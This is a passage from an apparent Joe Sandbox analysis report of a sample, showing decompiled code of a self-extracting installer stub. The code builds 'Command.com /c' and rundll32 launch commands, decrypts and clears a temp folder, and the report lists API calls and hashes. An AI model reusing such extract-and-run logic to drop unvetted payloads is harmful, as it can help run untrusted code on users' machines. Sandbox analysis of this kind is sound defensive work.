				_v1564 = _a4;
				_v1560 = _a8;
				E003E1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E003E1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E003E1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					E003E658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E003E1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E003E66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E003E66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E003E1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E003E1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E003E16B3( &_v1552, 0x400, " ");
										E003E16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E003E2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E003E171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E003E1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E003E1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E003E44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0x3e9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x3e1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0x3e9a34 =  *0x3e9a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0x3e9a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E003E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0x3e9a34 =  *0x3e9a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E003E1680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E003E1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E003E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}














































                                                                                                                                                                                                      0x003e1c38
                                                                                                                                                                                                      0x003e1c3a
                                                                                                                                                                                                      0x003e1c3a
                                                                                                                                                                                                      0x003e1c40
                                                                                                                                                                                                      0x003e1c4b
                                                                                                                                                                                                      0x003e1c4b
                                                                                                                                                                                                      0x003e1c5d
                                                                                                                                                                                                      0x003e1c61
                                                                                                                                                                                                      0x003e1dd4
                                                                                                                                                                                                      0x003e1dd4
                                                                                                                                                                                                      0x003e1dd6
                                                                                                                                                                                                      0x003e1ddb
                                                                                                                                                                                                      0x003e1ddc
                                                                                                                                                                                                      0x003e1dde
                                                                                                                                                                                                      0x003e1d64
                                                                                                                                                                                                      0x003e1d64
                                                                                                                                                                                                      0x003e1d67
                                                                                                                                                                                                      0x003e1d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e1c67
                                                                                                                                                                                                      0x003e1c67
                                                                                                                                                                                                      0x003e1c6d
                                                                                                                                                                                                      0x003e1c72
                                                                                                                                                                                                      0x003e1c74
                                                                                                                                                                                                      0x003e1c74
                                                                                                                                                                                                      0x003e1c8e
                                                                                                                                                                                                      0x003e1c99
                                                                                                                                                                                                      0x003e1cc0
                                                                                                                                                                                                      0x003e1cf8
                                                                                                                                                                                                      0x003e1d07
                                                                                                                                                                                                      0x003e1d23
                                                                                                                                                                                                      0x003e1d09
                                                                                                                                                                                                      0x003e1d14
                                                                                                                                                                                                      0x003e1d1b
                                                                                                                                                                                                      0x003e1d1b
                                                                                                                                                                                                      0x003e1d2b
                                                                                                                                                                                                      0x003e1d2d
                                                                                                                                                                                                      0x003e1d2d
                                                                                                                                                                                                      0x003e1d38
                                                                                                                                                                                                      0x003e1d39
                                                                                                                                                                                                      0x003e1d46
                                                                                                                                                                                                      0x003e1cc2
                                                                                                                                                                                                      0x003e1cc2
                                                                                                                                                                                                      0x003e1ccc
                                                                                                                                                                                                      0x003e1cce
                                                                                                                                                                                                      0x003e1cce
                                                                                                                                                                                                      0x003e1cdb
                                                                                                                                                                                                      0x003e1ce6
                                                                                                                                                                                                      0x003e1cee
                                                                                                                                                                                                      0x003e1cee
                                                                                                                                                                                                      0x003e1e89
                                                                                                                                                                                                      0x003e1e91
                                                                                                                                                                                                      0x003e1e92
                                                                                                                                                                                                      0x003e1e94
                                                                                                                                                                                                      0x003e1e97
                                                                                                                                                                                                      0x003e1ea4
                                                                                                                                                                                                      0x003e1ea4
                                                                                                                                                                                                      0x003e1c61
                                                                                                                                                                                                      0x003e1c07
                                                                                                                                                                                                      0x003e1bd3
                                                                                                                                                                                                      0x003e1b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 003E1BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 003E1BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 003E1C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 003E1C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,003E1140,00000000,00000008,?), ref: 003E1CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 003E1D1B
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-2869639027
                                                                                                                                                                                                      • Opcode ID: 6d9d29929969a073433117b07272e681c7e1329286ff6ffa06898521a7a0de26
                                                                                                                                                                                                      • Instruction ID: 391c7d99f2b0fd249f8f287a409745d1434dcc19ce1c24824f6bd796693b34f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d9d29929969a073433117b07272e681c7e1329286ff6ffa06898521a7a0de26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03A13671A002F86BEF239B26CC45BFA77699B95310F1403A9F555AB2C0DBB09E85CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 450 3e2f1d-3e2f3d 451 3e2f3f-3e2f46 450->451 452 3e2f6c-3e2f73 call 3e5164 450->452 454 3e2f5f-3e2f66 call 3e3a3f 451->454 455 3e2f48 call 3e51e5 451->455 461 3e2f79-3e2f80 call 3e55a0 452->461 462 3e3041 452->462 454->452 454->462 459 3e2f4d-3e2f4f 455->459 459->462 464 3e2f55-3e2f5d 459->464 461->462 469 3e2f86-3e2fbe GetSystemDirectoryA call 3e658a LoadLibraryA 461->469 463 3e3043-3e3053 call 3e6ce0 462->463 464->452 464->454 472 3e2ff7-3e3004 FreeLibrary 469->472 473 3e2fc0-3e2fd4 GetProcAddress 469->473 475 3e3006-3e300c 472->475 476 3e3017-3e3024 SetCurrentDirectoryA 472->476 473->472 474 3e2fd6-3e2fee DecryptFileA 473->474 474->472 485 3e2ff0-3e2ff5 474->485 475->476 477 3e300e call 3e621e 475->477 478 3e3026-3e303c call 3e44b9 call 3e6285 476->478 479 3e3054-3e305a 476->479 489 3e3013-3e3015 477->489 478->462 481 3e305c call 3e3b26 479->481 482 3e3065-3e306c 479->482 491 3e3061-3e3063 481->491 487 3e306e-3e3075 call 3e256d 482->487 488 3e307c-3e3089 482->488 485->472 498 3e307a 487->498 493 3e308b-3e3091 488->493 494 3e30a1-3e30a9 488->494 489->462 489->476 491->462 491->482 493->494 499 3e3093 call 3e3ba2 493->499 496 3e30ab-3e30ad 494->496 497 3e30b4-3e30b7 494->497 496->497 501 3e30af call 3e4169 496->501 497->463 498->488 504 3e3098-3e309a 499->504 501->497 504->462 505 3e309c 504->505 505->494
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E003E2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v272;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				struct HWND__* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				signed int _t22;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t47;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t43 = __edx;
                                                                                                                                                                                                      				_t9 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                      				if( *0x3e8a38 != 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					_t11 = E003E5164(_t52);
                                                                                                                                                                                                      					_t53 = _t11;
                                                                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_t12 = 0;
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						return E003E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t14 = E003E55A0(_t53); // executed
                                                                                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t45 = 0x105;
                                                                                                                                                                                                      						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                      						_t43 = 0x105;
                                                                                                                                                                                                      						_t40 =  &_v272;
                                                                                                                                                                                                      						E003E658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                      						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                      						_t44 = 0;
                                                                                                                                                                                                      						if(_t36 != 0) {
                                                                                                                                                                                                      							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                      							_v276 = _t31;
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								_t45 = _t47;
                                                                                                                                                                                                      								_t40 = _t31;
                                                                                                                                                                                                      								 *0x3ea288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                      								_v276();
                                                                                                                                                                                                      								if(_t47 != _t47) {
                                                                                                                                                                                                      									_t40 = 4;
                                                                                                                                                                                                      									asm("int 0x29");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						FreeLibrary(_t36);
                                                                                                                                                                                                      						_t58 =  *0x3e8a24 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t58 != 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                      							if(_t21 != 0) {
                                                                                                                                                                                                      								__eflags =  *0x3e8a2c - _t44; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									__eflags =  *0x3e8d48 & 0x000000c0;
                                                                                                                                                                                                      									if(( *0x3e8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                      										_t41 =  *0x3e9a40; // 0x3, executed
                                                                                                                                                                                                      										_t26 = E003E256D(_t41); // executed
                                                                                                                                                                                                      										_t44 = _t26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t22 =  *0x3e8a24; // 0x0
                                                                                                                                                                                                      									 *0x3e9a44 = _t44;
                                                                                                                                                                                                      									__eflags = _t22;
                                                                                                                                                                                                      									if(_t22 != 0) {
                                                                                                                                                                                                      										L26:
                                                                                                                                                                                                      										__eflags =  *0x3e8a38;
                                                                                                                                                                                                      										if( *0x3e8a38 == 0) {
                                                                                                                                                                                                      											__eflags = _t22;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												E003E4169(__eflags);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t12 = 1;
                                                                                                                                                                                                      										goto L17;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										__eflags =  *0x3e9a30 - _t22; // 0x0
                                                                                                                                                                                                      										if(__eflags != 0) {
                                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t25 = E003E3BA2(); // executed
                                                                                                                                                                                                      										__eflags = _t25;
                                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t22 =  *0x3e8a24; // 0x0
                                                                                                                                                                                                      										goto L26;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t27 = E003E3B26(_t40, _t44);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t43 = 0x4bc;
                                                                                                                                                                                                      							E003E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                      							 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t59 =  *0x3e9a30 - _t44; // 0x0
                                                                                                                                                                                                      						if(_t59 != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E003E621E(); // executed
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t49 =  *0x3e8a24;
                                                                                                                                                                                                      				if( *0x3e8a24 != 0) {
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					_t34 = E003E3A3F(_t51);
                                                                                                                                                                                                      					_t52 = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E003E51E5(_t49) == 0) {
                                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t51 =  *0x3e8a38;
                                                                                                                                                                                                      				if( *0x3e8a38 != 0) {
                                                                                                                                                                                                      					goto L5;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                                      			}

                                                                                                                                                                                                      0x003e2ff8
                                                                                                                                                                                                      0x003e2ffe
                                                                                                                                                                                                      0x003e3004
                                                                                                                                                                                                      0x003e3017
                                                                                                                                                                                                      0x003e301c
                                                                                                                                                                                                      0x003e3024
                                                                                                                                                                                                      0x003e3054
                                                                                                                                                                                                      0x003e305a
                                                                                                                                                                                                      0x003e3065
                                                                                                                                                                                                      0x003e3065
                                                                                                                                                                                                      0x003e306c
                                                                                                                                                                                                      0x003e306e
                                                                                                                                                                                                      0x003e3075
                                                                                                                                                                                                      0x003e307a
                                                                                                                                                                                                      0x003e307a
                                                                                                                                                                                                      0x003e307c
                                                                                                                                                                                                      0x003e3081
                                                                                                                                                                                                      0x003e3087
                                                                                                                                                                                                      0x003e3089
                                                                                                                                                                                                      0x003e30a1
                                                                                                                                                                                                      0x003e30a1
                                                                                                                                                                                                      0x003e30a9
                                                                                                                                                                                                      0x003e30ab
                                                                                                                                                                                                      0x003e30ad
                                                                                                                                                                                                      0x003e30af
                                                                                                                                                                                                      0x003e30af
                                                                                                                                                                                                      0x003e30ad
                                                                                                                                                                                                      0x003e30b6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e308b
                                                                                                                                                                                                      0x003e308b
                                                                                                                                                                                                      0x003e3091
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3093
                                                                                                                                                                                                      0x003e3098
                                                                                                                                                                                                      0x003e309a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e309c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e309c
                                                                                                                                                                                                      0x003e3089
                                                                                                                                                                                                      0x003e305c
                                                                                                                                                                                                      0x003e3061
                                                                                                                                                                                                      0x003e3063
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3063
                                                                                                                                                                                                      0x003e302b
                                                                                                                                                                                                      0x003e3032
                                                                                                                                                                                                      0x003e303c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e303c
                                                                                                                                                                                                      0x003e3006
                                                                                                                                                                                                      0x003e300c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e300e
                                                                                                                                                                                                      0x003e3015
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3015
                                                                                                                                                                                                      0x003e2f80
                                                                                                                                                                                                      0x003e2f3f
                                                                                                                                                                                                      0x003e2f46
                                                                                                                                                                                                      0x003e2f5f
                                                                                                                                                                                                      0x003e2f5f
                                                                                                                                                                                                      0x003e2f64
                                                                                                                                                                                                      0x003e2f66
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2f66
                                                                                                                                                                                                      0x003e2f4f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2f55
                                                                                                                                                                                                      0x003e2f5d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 003E2F93
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 003E2FB2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 003E2FC6
                                                                                                                                                                                                      • DecryptFileA.ADVAPI32 ref: 003E2FE6
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 003E2FF8
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E301C
                                                                                                                                                                                                        • Part of subcall function 003E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F4D,?,00000002,00000000), ref: 003E5201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                      • API String ID: 2126469477-1274120739
                                                                                                                                                                                                      • Opcode ID: 1d5d806df4ecdc413009a03659113679710f93e969223f888e09e4a61a17eab4
                                                                                                                                                                                                      • Instruction ID: 2e27227ac5350b4b53a061d1143bf75e72c9754f211a917c9f857d341be4423e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5d806df4ecdc413009a03659113679710f93e969223f888e09e4a61a17eab4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7741B030A002F59ADB33AB339D8976A37AC9B54750F01077AE906DB1D1EB74DE80CA61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E003E2390(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				char _v284;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                      				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      				int _t36;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				CHAR* _t65;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                      				_t21 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                      				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                      				_t65 = __ecx;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                      					_pop(_t66);
                                                                                                                                                                                                      					_pop(_t46);
                                                                                                                                                                                                      					return E003E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                      					_t58 = 0x104;
                                                                                                                                                                                                      					E003E16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                      					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                      					_t63 = _t22;
                                                                                                                                                                                                      					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t58 = 0x104;
                                                                                                                                                                                                      						E003E1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                      						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                      							_t58 = 0x104;
                                                                                                                                                                                                      							E003E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                      							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                      							DeleteFileA( &_v280);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
